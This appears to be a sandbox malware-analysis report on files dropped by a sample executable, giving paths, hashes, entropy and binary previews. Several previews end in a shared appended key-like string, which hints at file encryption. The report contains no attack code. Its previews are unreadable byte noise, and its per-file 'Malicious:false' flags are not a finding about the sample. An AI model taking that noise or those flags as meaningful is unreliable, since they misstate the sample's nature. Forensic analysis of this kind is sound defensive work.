                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0c26606a-b0a1-46a4-93f4-5c80ba27909b.9812b80a-c6e0-4d4c-9248-5250a1144417.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.855797184144928
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ZeQW1Hz7tuEujqlC8loEtac7oxACb4YaViXmdKQPbD:JWF9IeJ1taccx7SwXmdKQTD
                                                                                                                                                                                                    MD5:66BA0D2F08CDEF9A191E87EED3989518
                                                                                                                                                                                                    SHA1:549B9405FD0BA69A2CD26DC63DE3F0E133C7E2DC
                                                                                                                                                                                                    SHA-256:EDDA788E0EAA3C326B37BEDDF0C2916DFFADA61EF71B5CD0A6AAFF1372E98AE6
                                                                                                                                                                                                    SHA-512:178B644AABB04FD563FF22ECC98417BE57546BC3443B4CAFCB2AF0CDCEB43B15B97A23A087EAAD54C64D62E49F834441BEFB0B63EE06C84395B1D579E0345EB4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....j..,<urR....-.......{..b.Zw....G.Z..KN..l.....R.t........|g...S..^5<.%.M...(.......iK...w...(..P..m..JX....b.(.5...4.E...h....].KZ....)Gi.?..Z..b..j.R.%EU....../...;..os.pn.#i..x<.D......Y.)A..D..y.e....u.lD...;E...>../\.(O.a6..r...\.'..9.../.8...?.*X..?+..\...6}..M&.e.....@.wjM.E..^.V....c..6.d7L.S.~P......O.......s.p.\..&.;..^..[t...]....5i....Z../:....m.z.........)[....... ...[..u........,5...M.q4..[..p..Gi.Wc..Im...}9....^..A.&..1........^*"{x.k........I.8T......}..-...mS...2}...Z..E%_J.......[Dm.R...tC.Gc..R..B...b.\.eL}'...O.J;D[.\.I......L.o......f...l.[.;...)j..G....f.j.P..{.R......v...YZ.N....i."...X7l...6..W.ri..F.B...H...HaNL.?5....9.z[b.V..........%m....C.n..u...r..I.;.[*...a...$......,.%.\.F.4...e.r<9.../...z..b..,Lo...6.7.....~F....;.~.7,[....n[#.Nkp#.}...H."N."X..d..C..fa.....A.'<.a..v.~D..q.r.e.~...=...X........:..4....@...Xm..;.p...2&.....".*O.....V.wa..!E...V.=.~.I....>..u..=.V.*...i.W_.ar...h.C.c.t7h.4.k..k..k
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0c26606a-b0a1-46a4-93f4-5c80ba27909b.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.702042612810531
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:JNo7q40rtjY98i+Xinmwkt9bCNysidGXRZn51Ds8xSRkVW1gAPgzaAmJjazRciik:Jud47X+ut9bmaGRJDztVygBzayRbD
                                                                                                                                                                                                    MD5:0A418408A9AF71F0185DC435B1A78E7A
                                                                                                                                                                                                    SHA1:768B89FF0F36AAEA3C0E9628492CE6AE52747D72
                                                                                                                                                                                                    SHA-256:07AA041780BE43638E3B19F3D25442025F1DE5262F5A718DB318B51B9CD7438C
                                                                                                                                                                                                    SHA-512:D4E12EB6A73207908385A35F2CAF07257147DB93FC037BA77D36DB1FD440379701FE8BCDABB5251CD7DC7B50F4EDF070C309C23A30673994CC9CABB100F89D2F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n..LOcim)p.......(kc;...yFi.p....H...G'^H}.. ..}../..!.......J..=...e...{f...A.......W....n O'..2.THK........<...-..{..'O.4.C.H....i..z..wfx.3....}.......C.j..t:..chCwk......c+c.I(bMF7.L.&.t..w.=/......s..)...&..{.....D0~K&.[....Z...rP+t.b..s........g.EFy|L...$b8..r.(...S.U.d......R..Q....j......O>g.3......5........{..c.Y.'9z.6)e.Z..E..m9zQ...f....cu.........~.z..t<.s/..D.K$6..`.....l.A.26..v.g#...$...6S...E..)...X..d.....#..l...u.....K..](.......2.%0...vZ.F..b2bY..&:.|`....N..pj.....L...}..e.#..-./k...[..hCq.....;s...........q....j...?.[$........w..S..V+.W.....a.@......`.~...Up....&S.._.....GE..Kw.A^*A LL..).<9@..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cdc9e7-deb5-4e34-b206-d5b147c43960.43e7a056-3321-4ed5-928b-fff49dbc8ba5.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.835427495031974
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:P71StY5PMR6sSl6TVBGdzGnyhzDdlE3c3RvwmBYKbWNitLJX0uPZCOJXbD:4tGE0OBY550itGYZCorD
                                                                                                                                                                                                    MD5:6FAA704AA54BE91CB47084D2A5887087
                                                                                                                                                                                                    SHA1:F6634E65833040874E3754B3BF46599007B55721
                                                                                                                                                                                                    SHA-256:2F2A0C6A7EFBBEC873CE56E2A387F72D15B07BBAFD69093CACC8D88DF27E6777
                                                                                                                                                                                                    SHA-512:E144198C81AE3DE179F2A2EA590F16F2721E383E121D5825C5B75478C303E915696C5EF4FC60EB49DF8EFAAD118835B1F7608CD630C7B642A05C7CF064A44312
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..|..M+.......*...e..m3.6.......{uB.c/j..u..rDz.....O..6..+.X..0.=3..K....Ix6.....>...V..N...o..K...P.f..#.S.5......(.W....O.tY.,...Ou..[....y..m.....u..`..2.d.....xx2.9.....y.Y.U{X....~...)..)\..X.;ZeP.....!pY.g.[.....Ou..........y...[6.)...S.u.*..Y......%.!r.....p.XO....u..i9..{..rL".9.U...s.3..a+..i.1E..Ml.....I.v..<..&..2..Ih.q....>....c.....6D..Ap".....}.?....o*)........<%...8.C9.Z.S{..&..j~...h.).@!.*.."u..@....O..E@U....4.s.....#Gocg.K.;B.;...^$...".-Vlx76l:...;...`....wK..A..-.e...!..<>T...N..!J.s.).....@8.B5O.;.(.R.c.....~VJ.U..5.."H-.......i..`....C..)Mc.Z>..}J{.[./.'.C+y.......k......h..x.{V .+C8Sm...K..........y.....bg..#..A\....F.1..\...`..%1lxR.[E5%n?@..".o..T..>..AQ...@...5..b\~.~0..b.T.g.........k.G.#...Q}.B[....$...@T~.j..q.A...:.O.2a..D.i....\.zN.f.w^1Az.|.x.:/..WM ....N..3D.u@...?.....Y.RO......s..X..`...ZdG......cz.g............hNd.PH....=:kvj...Sv...x/6!..m.9E...V{Q.....R..c....b.g..9.!..w..i..+a?..x.1.. ....)...B.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cdc9e7-deb5-4e34-b206-d5b147c43960.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Sub-key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.721999581704604
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:1LlR2nqOh0jZ3mhr20LpSuMzzH6Zk8IaQoGCF74Z3plFPTNVwcii9a:1/7pjpmZ23uMvH6ZPyoPF74Z3pfTzwbD
                                                                                                                                                                                                    MD5:FDEF0370DA5EDD8FA2C4E51762CC182E
                                                                                                                                                                                                    SHA1:B881B1443B278D8DC3F0EEDBB9357A497A872A36
                                                                                                                                                                                                    SHA-256:20FE7E26E6F75CEF714370380F6BAF98DDC037BCEBD2D86CC1B9CF845A6EE6E8
                                                                                                                                                                                                    SHA-512:DD8162A6F90C71F3C73FC915BC79C862E1F98498BD09A07DB99DCF1AE8B7ADA3774D0337B6A88E9BDE72562100B5E60D1F976AC98E59C1DD557AA8CA1D45999C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .lp...c%......=.V.@...vl`'6g'.....{).!...u.(Q....;|.U]]8QJ..+..e....C.#M7..).x.Q]..A...b.biv`.....?.Z.-..*..L..@&..\.I.2........mB./...&..|>..!<.e..W....p..e.....N...EKS."jV..k../..U...y.....Y..u.9........c..Y2..q....3v.%.3.F......m.......c...R..........8#.7...OqYQ..z<.....%w..8f...-..H...7.....t.....5f...S...{.@d..(.X<fT.w..ye.^.o.....7....ra.6`...!$.v..{..!.u...q.5.......l..Q..`.93..%2.e..Y..3.G?(..~'.....q_PHB.Rn.....k...W.k.T...7.pT.u`.Q.Zqq..).....'.{.)y..F......$O74.a!.1j..\k..3...Mm.k.J.t....6....'..o.......BW.w...`..y..+..9.f.....Q.}\...9N......t..]L.G.>-#.{...Rj..?d..I{.i.P.;..NO.....3....w.`...H....6g.....*i.(...5Z....C5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\354a2559-c57c-4126-a131-22a580303e4b.a62f4707-7877-4f38-bd35-86ca71f286f8.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                    Entropy (8bit):7.852498789777023
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wHmNrIInG5pU1en5fjAeY8B31BSES6LC5euKXCQ8srGZhWy+BTQ8v5bD:kc5G44n5flh319mZIr+hWtxQ8v5D
                                                                                                                                                                                                    MD5:9E1A75676BFB05F3CF0003B6D9FD6880
                                                                                                                                                                                                    SHA1:02E4B7C03B23C3BB771E0DF4880C3A2A908FC66B
                                                                                                                                                                                                    SHA-256:44A545416080253640664B6D9BF9EB502C5FE59576D27B68EDB8EF706D05F5A6
                                                                                                                                                                                                    SHA-512:77084504EF705892A2C8608A481D915BE358FA4E28AFE299CF13ECD5BBDE0A9FCC80B83D135D26617BFE92E65EB573397CC3BF48941069A8C342640C1A33DBF1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..{0:y`.."9qSK...+8f.9q......6w.......5n1................)..g&.%...o4.h.^h..$.....i.B..2.k..3@.....j.W...^..2....-]..sX5s.&KTm0......&.....u...5.Jq...fT..[6hbN..:.?.hS....Sz........}z&.Kp...~.......__...6..>./J...eIu.k.&..y.........Jf._|f....Wx..u\."..n..x.a]MCg._<+....}.li.p.;..Y.P.iK.)5.8Zl+.m....;q.:..X...N:q...[T.x.V_...r..D+.....J.RC..M.]....m.9. :........M...-...*F.b<...F./...6.8.Z...=.>ul_D.:(...G...XI.....5...6..!.w...0._~...p:h3......d.....q.x#?...OH]..>/.q6.....7(.S..<8....)_...X3.,C.i..2.>Ev+..*Q.....u`5..m=/.8.......Z.~..-......Q...I.7Q.....o.....Q...~..0p6.T..Z'....m......o7..s.X.\.}.V.\?..'.[...*.pAj..$.'Zo.y0.*1'a..4..y...%r.!.k=...7...r.(.&.^.9...T.G....K..I~..._.....n%b3s..d.$l...i.I..l...k.bEU.p....K..(T..-.%858.;O.............{......e............R..K.U.......4......<../..;..dU............/bS....p........h_0.E..X.....1`+.Q...*..s^...._...!:...Jn..p....$g.%2.?$..#A;.&f. ......E]5..l...gb#%._'$.J..>..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\354a2559-c57c-4126-a131-22a580303e4b.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.7014151014567656
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:XhzKCUy2eP0ejYNGXxot9Vw89XHySeBhbyTHN1/juOgh9pj4pJix/1U9ZRv4QciD:RD32A0bsX2HHHGyTDqSoxNU9XvdbD
                                                                                                                                                                                                    MD5:6F4658667666D5ABC9F4AACC6355DD49
                                                                                                                                                                                                    SHA1:F8076F6D728B0A4624BD8C11B7BA74ECE7C7EE86
                                                                                                                                                                                                    SHA-256:C192ED904F364D4209383566DD07C2C7B654C35E78651119A919358FB41C8FC1
                                                                                                                                                                                                    SHA-512:B8BD7D9F232CC5EC324E36EB0442F9D97FCD9D6A199D659320595A6C8CF7DC64B60DDB1A0527D2F2C2E530251E2F9143552BC4AA6F1003D037CAADA3A0CE2BCF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .\........._.C.S..1.......p.E.g1..K..y...N...iN.;....&M..X!...#./8?.z.$.!.]%.......[...@....U.{..4J3{ca...`i.h.9.Ct>..8..v....-x~h2.i.&Yn......0wL.Y._S...j..bI.....z....F....k....9.......Q..D(...4..y...G/g....$...jZ..|j..-..I...%u..~.....A.pfW.~.....u.d.o.6.o@...I.0FHd.._. .-.....3.ZV@NZ..Z..r...d.^.....r..`E...fQ_..uU<.>...B.....r.`.....C.h..xC..k..h.n.[z.NQ.+...0j......2..*d..<.<..(......Z..JV?8..M...&..5!RY.3....0.....q.6....DN..-....5Y.H....c...5...?.`.........M..Z.B.U.F..".{...5kV>..e...'K>..s..KR.?......|....ycB,.'cif....!.#...\. ....y.':U'....^...Ab.]h.h&..(..n.._o......j...#2.....riG.2.r.y}..Q.....f...2].5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3875b048-3aec-4e31-bd09-febc5d5c8ed1.044fe3ab-4f27-428e-b012-1588917026de.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.850500347651017
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:qh3xBStJXT4L/9iFgJ+UGEqIkd9jO1o30/cAkgebPtRy0fDkrn/obFjFNvhNlF8m:qhCnW9UggTEqP96+IcAveTvb9bFjFNv5
                                                                                                                                                                                                    MD5:69A13A30DA3416BE33BF68CCAEEAA751
                                                                                                                                                                                                    SHA1:48DBF63391CE3D3276D77B21F8145FE51BC5AA78
                                                                                                                                                                                                    SHA-256:8B4F179F154DEC470D68F7CD7FA1C54A50A0BEBD8872AC4FE963B2B747E238CD
                                                                                                                                                                                                    SHA-512:7899E3B9B4591C5A05726DA3E4474869CBCED1D34A9E3105336AE1BFCCD76FE01748C8CBBF7C72C8446C2885ED8C01A548048834BA2D6034134FA2DE6B5FABF0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @d......K....q.s...G.~p....@.| {lC...C.,.t..t..Lr:|b. ..iGk.g.X...L..R...Iu.i...%.,.a........Pz...z.0L..-.0AN.....ih.%...Z.R.D.}..sV.,...\........_..5..iKY..9./R...j..t+ .....b.~<..|.<.e.v.@/...r7r...q.i3.A..E.%.p.fW.o.;o.#.!....2i.....}.[..x...a.w."wO.....B..!...[94...+.../Od.......C...?.F+X...8..$P..B...].<q.y2x.mR_....M.0...E.....{wUE..o......N........tFaR),1.y..H....MK.....Cz;......e.>.W.by..7.s.my..E..d..m!.W........Q..D?.P]....I.o.I.%...{...V..:..p..X@n..........!......O.d..l]..'K..4...9.P]q{..;...;7....E...2\...<............v.Q........p...b.v.r...].+..HZ0......L.b.....44....d......Z..$9Lx.....zzL...3.Y_.....$po...1RI...!..l..Y.+....;..B....C....8>S .....fj.......w.6.....U.;v;@.....#.V.........;t)m..m^&.....>%.O..i..^...E...o.<.Lvil.j...Zh>3...m.{.a.t_Ea.@....B..=.....zq.Q.Wa!0...5...v.-.:lc[......|X?|..$.$V..S..F....`....8.....,.*A*.".h=....e+.-...{...C.2).iM..Sv..8...$.h...:....3.Y.6......?.Z..g.d4..n...a..D}.-..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3875b048-3aec-4e31-bd09-febc5d5c8ed1.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.666748555110161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Mf9GC/JLYgNfdhkvTUhf84+06nqaZiUzDsz/Q5e/ezxECEyewcNHyye3Blcii9a:MVGCRLtjy74f8atIiUzwzo4/ezCHH03j
                                                                                                                                                                                                    MD5:B9A7BC46151CEA993DDD9E558C5DB956
                                                                                                                                                                                                    SHA1:34BDA0B6926554D5B24B04829DFC712EADFF840B
                                                                                                                                                                                                    SHA-256:8BE284D1C6D0D628E9BB3C7E15F766D0C4A83CD37FCE113021BBA60AE17704AF
                                                                                                                                                                                                    SHA-512:55A71BE4BD78BEDBAAA657B5F0A1089E2C8FAC92E2CAD49440DEB151F9B8E1AA6D474910FDF8E8BD0596628F7D27136BE176B7CF31DE0C0FA4C903DE6EDA67DD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..2....s6U.y.W#F....i..V.....`.|;......Q....}..<....w..y.U..ge..tj.GJRb.ft.l.8*........[#_..@W..m4..).:ND.D.>mu.,...O...p..xH.O.?.).|..w.......;n...t...V+../.E...._x7.A..V..36...}.U.bsK..C....?#.O$R6._....P...@.....l.4.]2...p%S\......&..r0.*E..U.'..8iE...E...-`..\.c....5o.+T.y..k_.M.H..R....Vr..c..p....lYxm:..,.~..[..:.1J{G..o.........j.^.!.....z...8./&...%1....p..._...+@.st...K....I(Z..#.......t...Mj...dW.!.ei.o...\i..*.$...|.q;.(..#..o..h....-...T;7.}.'s.H..>.X.......B..p.}.C"Z..w.wA....d..'..a..6.~fyY.{.bX.m\..X..#.-...>....+JMD........A.e.o@G.$C.$..E...ww....<.#..&.. b.1..f..+..q(.?.o.....0S.JS...D...@....*;..l..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4ccaddfe-4b47-4226-81c3-9c7c8236f2a7.e7a27907-b215-479c-bb0f-f1bebedad2ab.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.858444394110016
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:DwutcgMKqRoCaf+1hj0J8ho4AXnvucLyjNghCxrPIEYoLeH1F5jbD:fMKrK155hY32jNghCxrqoyVFhD
                                                                                                                                                                                                    MD5:4EC64CF361EFBDBE9C8108BD3684D37D
                                                                                                                                                                                                    SHA1:E78A5AFCCE97302F4C33BE67EB467E20D5725610
                                                                                                                                                                                                    SHA-256:3422F9E1DA7F3B3D75EF4C59E138DCCA9E45A0742A4EAC2BBF27C731A49AB54E
                                                                                                                                                                                                    SHA-512:E4D69763F1AFE2FDBE9AE639E9F49DD123419F8D2D9A0E538D6A3D8DC0D66CD1107BE3ADC38D27275E811839BB15ACB00A3EE86B08EA073F2B79A57816A73782
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .C.T.+M..............8.O.FK......?......u~..~...,.uw.*.4,.6L.1.t...].W......p.....J%*C.CT`.j....j.2N..ku.53.U...}.......v......r{;..?..g .V...c8......D.R..R.;..J....}T....+.|.j...K.i.l..].+.)9......U5.x.....*BT..Et..._EX...#.>...E...5.-4.[%.v........hT.<.h;..V..}.....K/.q....B.....w.q.W....i..)Q......Z....ME..M.. .k.(.......j}.}.3...f....(..x0{.g$Y..r]b....q..F..lULm...._..x.Ez.\..{F.4b....ti&...Y..og...r...4..B.Q[`<...V.L.0.U.#..=.[+G..b...)`..:%............b.H.....Y7*...`7.=...n(.)..a|......]?....,.z..P....%H6..D.{Em!...I..X/.D+x.......0{.Z.g\..^!...].U.tyG..>..z,..SL8+......M.I.....By.Z...6.Y.Js.5%..W.}:....3;......Ws..;...Y....#...22.Km[E.ZI".Bw.._.;......)}t..:.Q....E.[P.Y.[..,.d.w6F`;.I...s.l ......-E.?@...p,.U3..X.5.+.9.r_.qb5E.f.d....//(.K|....]03.lWP...e...Q...8\0....}..@....l.J.I..{%.}.-..2U? .........6......+.^.Cz.I$.F...1...~B..N(...G..6.X.{....&T ...=.Z.?Y......:M..s...9.Tu.......,...4..F..8.W....NL$".`o}".......p
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4ccaddfe-4b47-4226-81c3-9c7c8236f2a7.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.661212160866063
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:cL2b/Qtx7UvKjpK0KuJm6R+ivLjHGQt8pxoZXoeLMYQptJidVrcii9a:S20tRUvUKIJmwz78piZV9QptgbD
                                                                                                                                                                                                    MD5:33BC547E30416C5088D6CC0F14D054CB
                                                                                                                                                                                                    SHA1:CFDB60161F1A4CC4474E3A401F0A54F39C393412
                                                                                                                                                                                                    SHA-256:763177EB7C6452F666C1D66E23DC76182D118B970F41AE27BD6BEB13470E5218
                                                                                                                                                                                                    SHA-512:50D0D72EFA18684E859ECD4C94392A0EC7074CE0D68C0D7032FD5D8F663B5B32039BD1567222DF8DB5C7F56597282BF194287F5D08EB6173AD6EED883F4E4F73
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <.s..gm#.e.c....FSX.j..........)......#....*[.2....].qi8r.>..m..+.G\>.\'.h..'..4.]G.....0%..Ag`.Z.G..J.b.t&.BA.......:.0.....|Y.tI..h...U...b....$...<R...Eb....l..4..M..@.Rf@b.r.Wa#M#....'..N.5..E2L..O/...I:./.......u.V.6...}...X..M...8..oL...Q.;A..0....E..d.....$....-.r&..F.|o.^.../../}e..(..|..ac...........a.@hA.......o..._t.y..T.^q(N.....P.....791.^_.10I`22WQ.9..m..b...g.Ir.....r'.~...f....\h.".(B;"....Kw..Y.+Ss.c5.l......j..x.*.R.....c..@.......%....V.s%x$..m.,.*.~A....(..*...t........%..Z...q.E...{.J...P.s.......X.5U..}....JL.&zp\...T=..:.z\..t...D..._.v8..{....Z..12..0`..3..<G<..00.q..+..X...L.......i.s....."5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\55b08c9c-3b78-48e7-ad6f-eafec6e8dc7e.d8cdd672-f8b3-4fa2-a6fe-bd37feff4f38.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.826987784569056
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:QnwVTE4prH3BOyqnQxcwIlyVtEsJbYlvEPC/DeOTvdUHSt1OZBE8sJqF4bD:owZE4pbBvqQK8re1hKOTlUytsLEt+iD
                                                                                                                                                                                                    MD5:0A933483B5E4039855F809CCBAB77DBD
                                                                                                                                                                                                    SHA1:E8F8CE2DFA09C130F2B9EF538C28C32BF1C93D51
                                                                                                                                                                                                    SHA-256:FC3CEA1808A2F03DDB40AFC92B6599485C16DF8AD771EB368BEEEF4B7BED77D0
                                                                                                                                                                                                    SHA-512:2A86C6F1F67900DE84015EED93B57DF469391BC3844ADD2797714FDB416594215D48F49FB3467666DD6C671DACFA5A34D5B1F78E6D4AE5385FE18B7FBFF4F655
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .H.U.w.]..n...$....O..j..m....e.I..B.|.{...fb"o?..1........x.....fKX....@..nI...w...~.sLw.]....x@...t..[.D..f...V...I.H.7O...Pa.....0A..gt2..G`....T.i.,...^^X...z.l.....#....B.Q.s7...*.%C...y\....'9.>.K.}.[.6p`...JO..........N_..\...v..^....53-g.R7`C.....XB$..@.r..."q.k._...7.%....#..#...^.Qr..&.......`......e...".t..w........0..`..Hk.0...lC[>g=E)t.5.A.?~O.;.@..j...Q..w./...<.._TI.Q......=...LN.P..."..].2..#.j...{w...P-..E-._........E.v.8-|..kDr(.Rv*.@q..7Z.-.f.D.a.Y..Dy.)u?....a..rG..-....H....-4.C.0.s/..Y.(....b.@.#i"K..{.PeM..ak1.Z..q....!...V.&q.....J.K.n..*.Lz......A.@md.q.....@.T.q...Zr....$lr............V..6.-......V.......o|C.....f.5-'.^Kt.]&.l.....J.`(...K...$.>K._^.V6...G......z....{.8..QdT.Z!...W+.`..J5..5...a>v...a..Oo.ew.!................p....I.;-_......G....CB...s.6-...RPe.?..a.&N>r...4....$.D(......Q..g.<.....+U>.....4.........Y".4..5.[q4..kT2..S.2..O...34...D_:#.E...Y..a.r....N.....:..AUr.......S...*..|..\.....I3\.f...(O
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\55b08c9c-3b78-48e7-ad6f-eafec6e8dc7e.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.656765424188298
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:OVSvOBRRRWrAWCfAqct2lcqcgOEH+8mrskg7pQAh7MuTxhXmjcii9a:z0RRWeNlcvgVeFrsb7pQAvn4bD
                                                                                                                                                                                                    MD5:FF5B2568BE0E8B5CE8D707275350A8B9
                                                                                                                                                                                                    SHA1:37C67E5CCF7FFB715133316881E7942626FAD7AE
                                                                                                                                                                                                    SHA-256:3C812DC370D03B85973E786EFD150F2631DA2AF73791D4374E38EBA17E7A2E37
                                                                                                                                                                                                    SHA-512:26C99AC268FC5E20FA9DF3739550F89DE85DD07CE3661FCC68A02254871BC1FDB27A625BF8D6C1D3F706E078F2D80880FF28210C88FE0E21485806A6DDE9A329
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
